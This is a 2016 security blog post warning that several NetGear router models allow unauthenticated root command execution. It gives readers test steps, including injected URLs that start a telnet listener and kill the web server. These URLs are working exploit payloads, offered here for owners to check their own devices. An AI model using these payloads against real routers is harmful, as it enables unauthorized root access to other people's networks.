Kalypto (in)Security

Research, demonstrations, and popcorn.

NetGear Vulnerability Expanded

A vulnerability was discovered in some NetGear routers that allows remote command execution by visiting a malicious site or a legitimate site that has malicious ads served to it via AdSense or any number of other ad services.

The vulnerability allows execution of Linux commands by simply appending the command to a URL.  The commands execute with root privileges (god mode for not tech people).  This can be used to pop a telnet session, FTP, command your router to attack other computers, or pretty much anything else the malicious user wants to do.

As of the writing of this article, there has been no official patches released by NetGear and most news organizations reporting on this vulnerability are giving incorrect information.  Most have stated that only the R7000 and R6400 are vulnerable.  THIS IS INCORRECT.  I have tested all models below, with the exception of the R9000, and have found them to be vulnerable.

If you are running any of the following routers, please check if your router is vulnerable by following the directions below.  If you are vulnerable, please discontinue use until NetGear releases a patch.

  • NetGear AC1750-Smart WiFi Router (Model R6400)
  • NetGear AC1900-Nighthawk Smart WiFi Router (Model R7000)
  • NetGear AC2300-Nighthawk Smart WiFi Router with MU-MIMO (Model R7000P)
  • NetGear AC2350-Nighthawk X4 AC 2350 Dual Band WiFi Router (Model R7500)
  • NetGear AC2600-Nighthawk X4S Smart WiFi Gaming Router (Model R7800)
  • NetGear AC3200-Nighthawk AC3200 Tri-Band WiFi Router (Model R8000)
  • NetGear AC5300-AC5300 Nighthawk X8 Tri-Band WiFi Router (Model R8500)
  • NetGear AD7200-Nighthawk X10 Smart WiFi Router (R9000)

If you would like to test if your specific router is vulnerable, please follow the commands below.  If it is found to be vulnerable, please disconnect it from the network and power it off until a patch is released by NetGear.

  1. In a browser navigate to http://192.168.1.1/cgi-bin/;telnetd$IFS-p$IFS’56789′
    Make sure to replace 192.168.1.1 with your router’s IP address.  You will just get a white or gray screen depending on the browser.
  2. Open a command prompt (Win+R > cmd).
  3. Type the following into the command prompt:  telnet 192.168.1.1 56789
    Replace the IP with your router’s IP address.  If you get a message saying telnet is not a valid command, you will need to install the telnet client by going to Control Panel > Programs and Features > Turn Windows Features on or off > Check TELNET Client.
  4. If your router is vulnerable, you will drop into a screen that looks like the following.

    If you do not get the screen above, it means your router is likely not on a version of the firmware that is vulnerable.  As of this writing, all of the newest firmware released by NetGear is vulnerable for the listed devices.
  5. To kill the telnet process you will need to get the process ID for telnetd.  Type the following: ps | grep telnet

    This will give you a list of processes  containing telnet in the title.  The one you want is the one that shows telnet -p 56789 (or whatever port you used).  The process ID is the number that is on the far left.
  6. Type the following command:  kill <process_id> (replacing <process_id> with the number displayed during step 5.
  7. After pressing enter, the telnet process will be killed and you can continue on to disconnect your router from the network until a patch is released by NetGear.

Alternatively, you could execute the following command after every reboot of the router and it will kill the web interface all together.  If you need to manage your router, just reboot it, do what you need to, and then execute this command again to kill the web interface:

http://192.168.1.1/cgi-bin/;killall$IFS’httpd’

 

UPDATE:  NetGear has updated their KB showing the devices vulnerable.  They have released BETA firmware for the R6400, R7000, and R8000 that resolves the issue.  The BETA firmware will be updated with the final version once it is fully tested.  If you would like to download their BETA firmware, head on over to their support site here:  http://kb.netgear.com/000036386/CVE-2016-582384?cid=wmt_netgear_organic

maliciousnetgearremotetelnettestvulnerability

Kalypto • December 11, 2016


Previous Post

Next Post

Leave a Reply